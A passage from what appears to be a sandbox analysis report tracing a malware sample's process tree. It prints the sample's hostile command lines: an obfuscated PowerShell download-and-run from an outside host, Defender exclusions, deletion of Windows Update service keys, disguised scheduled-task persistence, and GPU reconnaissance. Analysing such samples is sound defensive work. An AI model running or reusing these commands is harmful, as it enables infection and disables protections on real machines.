kAPAAjAGYAaAB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBsAHAAcQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHkAcwBjACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbQB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAG4AdABrACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBkAGQAbgBzAC4AbgBlAHQALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAegB6AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB5AGgAbAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHgAcgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcQB4AHoAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAagB0AG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAYwBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQA8ACMAaABxAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGIAawB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAG4AZQB3ADIALgBlAHgAZQAnACkAPAAjAGsAcgBwACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbQByACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBhAHgAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAHkAcwBBAHAAcAAuAGUAeABlACcAKQA8ACMAZgBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdABmAG0AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAaQB3ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQA8ACMAYgBwAHMAIwA+AA=="
7⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1012

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
8⤵
- Suspicious use of SetThreadContext
PID:1348

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
9⤵
PID:1388

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1348 -s 96
9⤵
- Program crash
PID:560

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
8⤵
- Executes dropped EXE
PID:1252

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1396

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
9⤵
- Creates scheduled task(s)
PID:436

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 472 -s 96
6⤵
- Program crash
PID:1756

C:\Users\Admin\AppData\Local\Temp\new2.exe
"C:\Users\Admin\AppData\Local\Temp\new2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1148

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1124

C:\Users\Admin\AppData\Local\Temp\SysApp.exe
"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1776

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
6⤵
- Creates scheduled task(s)
PID:1784

C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1540

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1972 -s 96
3⤵
- Program crash
PID:1604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1168

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1872

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:748

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1012

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1360

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1532

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1628

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1212

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1516

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
- Modifies security service
PID:1560

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1680

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1736

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
3⤵
- Creates scheduled task(s)
PID:1720

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:300

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#waqsnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsDefenderSmartScreenQC" } Else { "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe" }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:572

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsDefenderSmartScreenQC
3⤵
PID:796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:1556

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:956

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1508

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1384

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:580

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1720

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:1712

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1004

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:1412

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1984

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1828

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1656

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
3⤵
- Creates scheduled task(s)
PID:1596

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nefucvtr#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WindowsDefenderSmartScreenQC /tr "'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe'"
3⤵
- Creates scheduled task(s)
PID:1124

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
2⤵
PID:1588

C:\Windows\System32\sc.exe
sc stop UsoSvc
3⤵
- Launches sc.exe
PID:284

C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
3⤵
- Launches sc.exe
PID:1340

C:\Windows\System32\sc.exe
sc stop wuauserv
3⤵
- Launches sc.exe
PID:1252

C:\Windows\System32\sc.exe
sc stop bits
3⤵
- Launches sc.exe
PID:1644

C:\Windows\System32\sc.exe
sc stop dosvc
3⤵
- Launches sc.exe
PID:1592

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
3⤵
PID:572

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
3⤵
PID:1756

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
3⤵
PID:1844

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
3⤵
PID:1984

C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
3⤵
PID:1992

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
2⤵
PID:1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#waqsnj#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WindowsDefenderSmartScreenQC" } Else { "C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe" }
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1564

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn WindowsDefenderSmartScreenQC
3⤵
PID:1928

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe ovyftblehadxh
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:976

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:556

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Name, VideoProcessor
3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1744

C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
2⤵
- Drops file in Program Files directory
PID:1756

C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe dazvaqbeggbsgujt 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